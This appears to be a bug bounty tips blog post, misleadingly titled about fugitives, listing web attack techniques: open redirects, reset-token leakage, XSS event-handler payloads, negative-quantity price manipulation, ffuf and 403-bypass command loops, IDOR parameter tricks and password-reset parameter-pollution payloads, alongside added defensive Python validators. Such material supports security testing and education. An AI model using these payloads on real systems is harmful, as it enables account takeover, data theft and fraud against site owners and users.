Bounty Hunters’ Tips and Tricks: Expert Advice on Tracking Down Fugitives

1. Tips For Finding Open Redirect

Open redirect is probably one of the most common vulnerabilities in modern websites. Here are some tips and tricks for finding open redirects.

https://example.com/dir -> [ 200 ]

In the above example you can see a normal HTTP request with status code 200, which indicates a successful request.

https://example.com//dir -> http://dir [ 302 ]

If we add one more forward slash (/) before the directory name, the status code changes to 302, which indicates a redirect: the browser treats "dir" as a host name rather than a path.

https://example.com//dir/anypage.com -> http://dir/anypage.com [ 302 ]

After that, if you add any domain (e.g. anypage.com) after the directory name, the site redirects to that domain, which could be an attacker-controlled one. This is a critical vulnerability, and if you find it you will get a good bounty.

You can try some more variations for finding open redirect vulnerabilities:

https://example.com//dir/anypage -> http://dir/anypage [ 302 ]
https://example.com//[email protected] -> [ 404 ]
https://example.com//evil.com -> [ 404 ]
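The check below is an added example in Python, not code from the original post: it resolves a requested redirect target the way a browser resolves a Location header and refuses anything that leaves the site, so the "//dir" and "//evil.com" cases above are rejected. The site origin, allowed host list and function name are assumptions.

```python
from typing import Optional
from urllib.parse import urljoin, urlsplit

# Assumed site origin and allowed host for this example.
SITE_ORIGIN = "https://example.com"
ALLOWED_HOSTS = {"example.com"}


def safe_redirect_target(requested: str) -> Optional[str]:
    """Return an absolute same-origin URL for `requested`, or None.

    The value is resolved against the site origin the way a browser
    resolves a Location header, so "//dir/anypage" is recognised as
    pointing at a host named "dir" (the behaviour shown above) and is
    refused instead of being echoed back to the client.
    """
    if not isinstance(requested, str) or not requested:
        return None
    # Browsers treat backslashes in URLs as forward slashes; normalise
    # first so "/\evil.com" cannot slip past the "//" check.
    candidate = requested.replace("\\", "/")
    parts = urlsplit(candidate)
    # Any scheme or authority means the target is not a site-relative path.
    if parts.scheme or parts.netloc or candidate.startswith("//"):
        return None
    # Only accept a path that starts at the site root.
    if not candidate.startswith("/"):
        return None
    resolved = urljoin(SITE_ORIGIN + "/", candidate)
    # Belt and braces: confirm the resolved host is still ours.
    if urlsplit(resolved).hostname not in ALLOWED_HOSTS:
        return None
    return resolved


if __name__ == "__main__":
    for value in ["/dir", "//dir/anypage", "//evil.com", "https://evil.com/"]:
        print(f"{value!r:>22} -> {safe_redirect_target(value)}")
```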

2. Sensitive data leakage using .json

- Request:
GET /ResetPassword HTTP/1.1
{ "email" : "[email protected]" }

- Response:
HTTP/1.1 200 OK

In the above example you can see that the user has requested a password reset for a victim's email address and has received a 200 response. The format used here is JSON; it is used to connect the frontend with the backend of the website.


- Request:
GET /ResetPassword.json HTTP/1.1
{ "email" : "[email protected]" }

- Response:
HTTP/1.1 200 OK
{ "success" : "true" , "token" : "596a96-cc7bf-9108c-d896f-33c44a-edc8a" }

In the above example you can see that the user has added .json at the end of the page name and has received the reset token for that user in the response; with it he can take over the victim's account.

3. What can you do after uploading


4. Top 20 Event Handlers to Trigger XSS

  1. onfocus=prompt()
  2. onchange=prompt()
  3. onmouseup=alert()
  4. onkeydown=confirm()
  5. onkeyup=prompt()
  6. onblur=prompt()
  7. onreset=alert()
  8. onload=alert()
  9. onclick=alert()
  10. onmouseover=confirm()
  11. onkeyup=prompt()
  12. onMoveOn=confirm()
  13. onabort=prompt()
  14. onselect=prompt()
  15. onsubmit=confirm()
  16. onblur=prompt()
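On the defending side, the reason every handler in this list works is that an on* attribute survived into the page. The allow-list sanitizer below is an added example in Python (not code from the post): it rebuilds user-supplied markup keeping only a small set of tags and attributes, so any on* attribute and any javascript: link is dropped. The tag and attribute allow-lists are assumptions chosen for the example.

```python
from html import escape
from html.parser import HTMLParser

# Assumed allow-lists for a comment-style field.
ALLOWED_TAGS = {"p", "b", "i", "a", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_PREFIXES = ("http://", "https://", "/")
VOID_TAGS = {"br"}


class Sanitizer(HTMLParser):
    """Re-emit markup keeping only allow-listed tags and attributes.

    html.parser lower-cases tag and attribute names, so onFocus and
    onMoveOn are caught by the same "on" prefix test as onfocus.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag: its content is kept as text, the tag is not
        kept = []
        for name, value in attrs:
            value = value or ""
            # Event handlers are never on the allow-list, but reject them
            # explicitly so a future allow-list edit cannot let one through.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not value.lower().lstrip().startswith(SAFE_URL_PREFIXES):
                continue  # javascript:, data: and friends are dropped
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))


def sanitize(html_text: str) -> str:
    parser = Sanitizer()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out)
```

For production code a maintained sanitizer library is the better choice; this block shows the principle (allow-list, never deny-list) that makes the handler list above irrelevant.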

5. Price Manipulation Method

1. Add two products to the basket [ let's consider a laptop at $40 and a mobile at $70 ]
2. The request is processed in this way: {"items" : {"laptop" : 1, "mobile" : 1}}
3. Change the JSON body to: {"items" : {"laptop" : 4, "mobile" : -2}}
4. The cost will become $20 for two items: 4 * $40 - 2 * $70 = $160 - $140 = $20
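The fix is for the server to price the basket from its own catalogue and refuse any quantity that is not a positive integer. The function below is an added example in Python, not code from the post; the catalogue prices, the quantity limit and the function names are assumptions (the prices match the figures above).

```python
from typing import Dict

# Assumed server-side catalogue; the client never supplies a price.
CATALOGUE: Dict[str, int] = {"laptop": 40, "mobile": 70}
MAX_QUANTITY = 10


class InvalidBasket(ValueError):
    """Raised for any basket the server refuses to price."""


def checkout_total(body: dict) -> int:
    """Return the total in dollars for a {"items": {sku: qty}} body.

    Each quantity must be an integer between 1 and MAX_QUANTITY, so the
    negative quantity in {"laptop": 4, "mobile": -2} is rejected instead
    of netting the total down to $20.
    """
    items = body.get("items") if isinstance(body, dict) else None
    if not isinstance(items, dict) or not items:
        raise InvalidBasket("basket must contain at least one item")
    total = 0
    for sku, qty in items.items():
        if sku not in CATALOGUE:
            raise InvalidBasket(f"unknown item {sku!r}")
        # bool is a subclass of int in Python; exclude it explicitly.
        if isinstance(qty, bool) or not isinstance(qty, int):
            raise InvalidBasket(f"quantity for {sku!r} must be an integer")
        if not 1 <= qty <= MAX_QUANTITY:
            raise InvalidBasket(f"quantity for {sku!r} out of range")
        total += CATALOGUE[sku] * qty
    return total


def basket_is_accepted(body: dict) -> bool:
    """True when the server would price this basket, False when it refuses."""
    try:
        checkout_total(body)
        return True
    except InvalidBasket:
        return False
```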

6. Github Dorking Tips

When doing GitHub recon, don't just look at the repositories.

"Code" is the biggest source of security vulnerabilities.

"Issues" are the second biggest, actually a gold mine.

"Commits" are good too; take your time on them as well.

6. 403 Find & Bypass Tips

Step 1:

In Kali, run this command for directory brute-forcing using ffuf (the -fc flag takes the codes as a comma-separated list with no spaces; it filters out 200, 301 and 302 so that the 403 responses remain):

ffuf -u https://target.com/FUZZ -w /path/to/wordlist -fc 200,301,302

Save the output in a 403.txt file.

Step 2:

Install the tool called 403bypasser in Kali and run it over every path from step 1:

for i in `cat 403.txt` ; do python3 403bypasser.py https://target.com/$i ; done

After running this command, wait for a status code 200 or 301. If you get a 200, you have bypassed the restriction and accessed the file.

7. A short story on admin access

  1. Ran a subdomain scan and got staging.target.com.
  2. It has signup and login pages; after signup I got redirected to target.com with just a simple user account, no email verification needed.
  3. Used hunter.io and got an email like [email protected]. Made an account with this email on the staging subdomain and got access to the admin dashboard with 13k+ users' PII.

8. Tips To Find IDOR

Suppose you find an endpoint for IDOR:
GET /api_v1/messages?user_id=your_user_id

Try this (swap in another user's id):
"GET /api_v1/messages?user_id=another_user_id"

Try this (duplicate parameter):
"GET /api_v1/messages?user_id=your_user_id&user_id=another_user_id"

Try this (hyphen and case variants of the parameter name):
"GET /api_v1/messages?user-id=another_user_id&User-id=your_user_id"

Try this (array-style parameter):
"GET /api_v1/messages?user_id[]=another_user_id&user_id[]=your_user_id"
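All four variants rely on the server reading the id from the query string and trusting it. The handler below is an added example in Python, not code from the post: it rejects any request carrying more than one user-id-like parameter and then binds the authorisation decision to the session user, so none of the tricks above reaches the data. The message store, ids and function name are constructed for the example.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed message store keyed by user id; ownership is an assumption.
MESSAGES = {
    "1001": ["hello from 1001"],
    "2002": ["private note of 2002"],
}


def get_messages(request_url: str, session_user_id: str):
    """Handle GET /api_v1/messages?user_id=... for the logged-in user only.

    Returns (status, body). A request that carries more than one
    user-id-like parameter, a repeated value, or a value that is not the
    session user is refused, so the duplicate, hyphenated and array-style
    variants above all fail before any lookup happens.
    """
    query = parse_qs(urlsplit(request_url).query, keep_blank_values=True)
    # Treat user_id, user-id, User_id, user_id[], user_id0 ... as one family
    # so a stray variant cannot be read by a later, more lenient parser.
    id_params = {
        name: values
        for name, values in query.items()
        if name.lower().replace("-", "_").startswith("user_id")
    }
    if list(id_params) != ["user_id"]:
        return 400, "exactly one user_id parameter is required"
    values = id_params["user_id"]
    if len(values) != 1:
        return 400, "user_id must not be repeated"
    # The authorisation decision is bound to the session, never to the parameter.
    if values[0] != session_user_id:
        return 403, "user_id does not belong to the authenticated user"
    return 200, MESSAGES.get(session_user_id, [])
```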

9. Application Login Bugs

You don’t always need Burpsuite or proxy.

Inspecting a page can rain bounties.

  1. The application has free and paid features.
  2. I was only able to access the free features.
  3. Clicking a paid feature redirects to the payment link.
  4. Went back and checked the page via "Inspect element".
  5. Found a parameter set to 'disabled'.
  6. Changed it to 'enabled'.
  7. Access granted to the paid feature.

10. Account Reset Using Password

GET /passwordreset

# Double parameter

[email protected]&[email protected]

# Separators

[email protected] , [email protected]
[email protected]%[email protected]
[email protected] | [email protected]

# No domain

email=victim

# No tld

email=victim@xyz

# Json table

{ "email" : [ "[email protected]" , "hacker@xyz.tld" ] }
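Every variant in this list works only if the reset handler accepts something other than exactly one well-formed address. The validators below are an added example in Python (not code from the post) for the form-encoded and JSON bodies shown above: a doubled parameter, a separator inside the value, a missing domain or TLD, and a JSON list are all refused. The address pattern is a deliberately simple assumption, and the function names are constructed.

```python
import json
import re
from typing import Optional
from urllib.parse import parse_qs

# Assumed, deliberately strict shape: one local part, one domain, one TLD.
# Commas, spaces and pipes are not in the character classes, so the
# separator tricks above fail fullmatch even when only one parameter is sent.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")


def reset_target_from_form(query: str) -> Optional[str]:
    """Return the single address to reset from a form body, or None.

    parse_qs keeps every repeated value, so a doubled email parameter
    shows up as a two-element list and is rejected rather than having
    one copy silently chosen.
    """
    params = parse_qs(query, keep_blank_values=True)
    values = params.get("email")
    if values is None or len(values) != 1:
        return None
    return values[0] if EMAIL_RE.fullmatch(values[0]) else None


def reset_target_from_json(body: str) -> Optional[str]:
    """Return the single address to reset from a JSON body, or None."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    if not isinstance(data, dict):
        return None
    value = data.get("email")
    # The "json table" variant sends a list; only a string is acceptable.
    if not isinstance(value, str) or not EMAIL_RE.fullmatch(value):
        return None
    return value
```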

www.thecyberblogs.com